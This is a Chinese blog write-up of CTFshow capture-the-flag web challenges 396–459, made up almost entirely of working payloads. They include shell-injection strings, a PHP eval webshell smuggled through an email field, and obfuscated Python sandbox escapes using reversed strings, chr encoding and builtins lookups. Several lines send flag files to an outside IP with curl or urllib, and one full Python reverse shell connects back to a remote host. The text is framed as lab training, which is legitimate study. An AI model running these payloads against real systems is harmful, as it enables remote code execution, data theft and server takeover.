CTFSHOW其他篇

已于 2022-03-01 18:52:48 修改
阅读量2.6k 收藏 10
点赞数 7
分类专栏: CTFSHOW web入门系列 文章标签: 其他 php web安全
于 2021-02-05 14:52:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/112692697
版权

文章目录

web396、397、398、399、400、401

url=http://1/1;echo `ls`>a.txt
url=http://1/1;echo `cat fl0g.php`>a.txt

web402

payload:url=file://1/1;echo `cat fl0g.php`>a.txt

web403

url=http://127.0.0.1/1;echo `cat fl0g.php`>a.txt

web404

url=http://127.0.0.1111;echo `cat f*`>1.txt;11/a

web405

url=httphp://127.0.0.1111;echo `cat f*`>1.txt;11/a

web406不会

web407

被认为是ipv6地址

ip=cafe::add

web408

用下大佬的话非法字符放在双引号里面绕过email@前缀限制

email="<?=eval($_POST[1])?>"@a.php

web409不会

web410、411

定义和用法
FILTER_VALIDATE_BOOLEAN 过滤器把值作为布尔选项来验证。

Name: "boolean"
ID-number: 258
可能的返回值:

如果是 "1", "true", "on" 以及 "yes",则返回 true。
如果是 "0", "false", "off", "no" 以及 "",则返回 false。
否则返回 NULL。

payload:
b=yes

web412

payload
ctfshow=%0asystem('tac f*');

web413

payload
ctfshow=*/system('tac f*');/*

web414

payload
ctfshow=-1

web415

payload
k=Getflag

web416

payload
f=ctf::flag

web417

想打人的题,一直base解最后的内容如下

include('flag.php');
$c=$_GET['ctf'];
if($c=='show'){
	echo $flag;
}else{
	echo 'FLAG_NOT_HERE';
}
?>

payload
ctf=show

web418

给的后门没法用,需要变量覆盖然后利用shell_exec
payloaddie=0&clear=;cp flag.php flag.txt
然后访问flag.txt即可

web419

payload

code=`cp f* f.txt`;

web420

ls找了几个目录发现在/var/www下(ls …/)
剩下的就是打开了
payload
code=nl ../*

还有一种方法,可以参考下大佬写的文章
比如我们想执行 cat index.php,可以依次执行如下命令

>php\\
>dex.\\
>\ in\\
>cat\\

接着执行ls -t >0
这样的话文件0中的内容就是 cat index.php
最后利用sh 0 来执行就可以了

web421

因为flag就在当前目录下,所有相对简单了一些
palyoad nl f*

web422

payload nl *

下面的题都是python的命令执行的,因为下面代码中的return需要返回的是字符串,所以不是字符串的我们就用str函数转换一下就好了。

最原始代码


from flask import Flask
from flask import request
import os

app = Flask(__name__)
@app.route('/')
def app_index():
    code = request.args.get('code')
    if code:
    	return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

web423

无任何过滤,,而且已经导入了os

os.popen('ls /').read()可以看到flag在根目录下。
后面的我们都盲猜flag在根目录下。
payload
open('/flag').read()

web424

去掉了自带的import os
payload
open('/flag').read()

web425

过滤了os字符串,过滤有问题,只会匹配开头
payload
open('/flag').read()

web426

过滤了os|popen,过滤有问题,只会匹配开头
payload
open('/flag').read()

web427

过滤了os|popen|system,过滤有问题,只会匹配开头
payload
open('/flag').read()

web428

过滤了os|popen|system|read,过滤有问题,只会匹配开头
payload
open('/flag').read()

web429

过滤了os|open|system|read,过滤有问题,只会匹配开头
payload
open('/flag').read() open前面有个空格

web430

过滤了os|open|system|read|eval过滤有问题,只会匹配开头
payload
open('/flag').read() open前面有个空格

web431

过滤了os|open|system|read|eval|str过滤有问题,只会匹配开头
payload
open('/flag').read() open前面有个空格

后面就是正常的过滤了,因为过滤了eval所以我们只能用exec来执行了.但是exec的返回值永远是none,所以只能用一些盲打的方法了。

通过一些特殊方法得到了每个的源码(不是问的群主)

web432

过滤了os|open|system|read|eval
复杂的方法的话可以用类似于模板注入的语句

str(__builtins__.__dict__['__impo'%2b'rt__']('o'%2b's').__getattribute__('syste'%2b'm')('curl http://xxx:4567?p=`cat /f*`'))

开个nc监听一下就可以了

web433

过滤了os|open|system|read|eval|builtins
payload

str(__import__('so'[::-1]).__getattribute__('syste'%2b'm')('curl http://xxx:4567?p=`cat /f*`'))

web434

过滤了os|open|system|read|eval|builtins|curl

str(__import__('so'[::-1]).__getattribute__('syste'%2b'm')('cu'%2b'rl http://182.92.91.240:4567?p=`cat /f*`'))

web435、436、437、438、439

435
过滤了os|open|system|read|eval|builtins|curl|_

436
过滤了os|open|system|read|eval|builtins|curl|_|getattr

437
过滤了os|open|system|read|eval|builtins|curl|_|getattr

438
过滤了os|open|system|read|eval|builtins|curl|_|getattr|{

439
过滤了os|open|system|read|eval|builtins|curl|_|getattr|{

python里面可以用分号执行多条语句
比如 a=1;b=2是没有什么问题的
payload

str(exec(')"`*f/ tac`=p?7654:xxx//:ptth lruc"(metsys.so ;so tropmi'[::-1]))

web440

过滤了os|open|system|read|eval|builtins|curl|_|getattr|{|'|"
没有了引号,我们可以用chr构造字符串

s="__import__('os').system('curl http://xxx?p=`cat /f*`')"
def ccchr(s):
	t=''
	for i in range(len(s)):
		if i<len(s)-1:
			t+='chr('+str(ord(s[i]))+')%2b'
		else:
			t+='chr('+str(ord(s[i]))+')'
	return t

print(ccchr(s))

payload

str(exec(xxx))  xxx为上面脚本运行的结果

web441

在上面的方法上用request进行了优化

?code=str(exec(request.args.get(chr(97))))&a=__import__('os').system('curl http://182.92.91.240:4567?p=`cat /f*`')

web442

过滤了数字,所以直接用chr不好搞了,但是还是有方法的

code=str(exec(request.args.get(request.method)))&GET=__import__('os').system('curl http://xxx:4567?p=`cat /f*`')

web443-444

payload

get:POST=__import__('os').system('curl http://xxx:4567?p=`cat /f*`')

code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))

web445、446

payload

get:POST=import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("174.0.13.43",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))

web447

get:
POST=from importlib import reload;import os;reload(os);os.system('curl http://xxx:4567?p=`cat /f*`')

post:
code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))

web448

get:
POST=import shutil;shutil.copy('/usr/local/lib/python3.8/os.py','a.py');import a;a.system('sleep 3')
post:
code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))

web449

get:
POST=s=open('/flag').read();import urllib;urllib.request.urlopen('http://182.92.91.240:4567?p='%2bs)
post:
code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))

web450

ctfshow=phpinfo^phpinfo^phpinfo

web451

phpanfo^phpznfo^phprnfo
一位一位异或的
'a'^'z'^'r'=i

web452

ctfshow=echo `cat /f*`;

web453、455、456

首先读取index.php的源代码/ctf/show?S=XXX s=index.php
下面是重要的一部分

public function file($request,$response){
	$response->header('Content-Type', 'text/html; charset=utf-8');
	$s=$request->post['s'];
	if(isset($s)){
		file_put_contents('shell.php', $s);
		$response->end('file write done in /var/www/shell.php');
	}
	else{
		$response->end('s not found');
	}
}
public function exec($request,$response){
	system('php shell.php');
	$response->end('command exec done');
	}

也就是说,当我们访问/ctf/file post传入的s会写入shell.php中,然后当我们访问/ctf/exec时,就会去执行刚才的shell.php。
里面的内容大家就可以随意发挥了。
我写的是

<?php system('curl http://xxx.xxx.xxx:4567?p=`ls`');?>

得到flaaag
接着打开就可以了

<?php system('curl http://xxx.xxx.xxx:4567?p=`cat f*`');?>

web454

和上一题基本上没啥区别,就是把exec改成include就可以了

web457

u=admin&p=phpinfo

phpinfo()返回值为true,所以满足$u=='admin'

web458

web459

payload
?u=php://filter/convert.base64-encode/resource=flag.php&p=1

yu22x
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow 其他
qq_45951598的博客
01-11 3201
web396、397、398、399、400、401 parse_url 绕过 源码 error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 这里没有什么限制直接绕过 payload一 ?url=http
ctfshow-web入门-其他分类(部分wp)-396-403
yutianovo的博客
01-16 627
396 传入 ?url=s;cat ls -al > 1.txt 得到 flag 位置 total 24 drwxrwxrwx 1 www-data www-data 4096 Jan 16 06:31 . drwxr-xr-x 1 root root 4096 Oct 31 2019 .. -rw-r--r-- 1 www-data www-data 0 Jan 16 06:31 1.txt -rw-r--r-- 1 w
2024年最新CTFShow-WEB入门--信息搜集详细Wp_ctfshow web(1),2024年最新看看这文章吧
2401_84301315的博客
05-06 883
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
[CTFSHOW]CTFSHOW-其他WP
Y4tacker的博客
02-10 2709
文章目录说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-438web439-440web441web442web443w
渗透测试-ctfshow 爆破(web入门)
保持微笑的博客
12-29 4909
渗透测试-ctfshow 爆破(web入门)
CTFshow——其他
D.MIND 的博客
08-17 1238
396——parse_url() 需要加上绝对路径 /?url=http://ls;echo `ls`/var/www/html/2.txt /?url=http://ls;echo `cat f*`/var/www/html/3.txt 397——parse_url() 使用../迁移目录 /?url=http://;echo `cat f*`/../var/www/html/1.txt 398~401 通杀了… ?url=http://`cat f*`/../var/www/html/7.txt
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow 其他(持续更新)
Lum1n0us's Blog
08-13 1263
文章目录web396web397-401web402web403web404web405 web396 <?php error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 可以先在本地测试一下pars
ctfshow web入门 其他 web396--web412
最新发布
2301_81040377的博客
05-21 621
这里我们要调用cafe类里面的add方法,而检验完IP之后刚好会使用call_user_func进行函数的调用。这里的函数写的是将//和ctfshow进行一个拼接,那我们就可以使用一个换行进行绕过。这里说明了host必须是正常域名,我们就不能写命令了,只能用;还可以弹回显,直接不就用哦本地了,但是没影响直接打。对host过滤了分号,没影响。里面讲了危险函数的绕过。把http改成1就行。
ctfshow web入门 内网渗透
羽的博客
06-26 2267
首先在登录函数中存在doFilter对传入的用户名密码进行过滤,所以很难去注入。再来看下另外一台靶机,因为存在web服务,但是又不能出网所以通过ssh端口映射到本地来。没错,可以用phar,毕竟我们还有个文件上传的功能,后面需要做的就是这么触发phar。没有使用doFilter函数过滤,只是要求了我们传入的参数需要符合email格式。先看下445端口,靶机给我们提供了msf,所以直接用msf打下Samba。在api/index.php中存在一个写文件的功能,假如可以控制。的值,就可以写入一个木马进去。
ctfshow sql
08-03
回答: 要在ctfshow数据库中执行SQL查询和获取数据,可以使用sqlmap工具。首先,使用以下命令查询ctfshow_user表的列名:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns。[1]接下来,使用以下命令来查询和获取ctfshow_user表中的数据:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[2]如果你只想直接获取最后一步的数据,可以使用以下命令:python sqlmap.py -u "http://b794446b-7f11-4600-beba-3de5961369b7.challenge.ctf.show/api/" --data="id=1" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[3]这些命令将帮助你在ctfshow数据库中执行SQL查询和获取数据。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值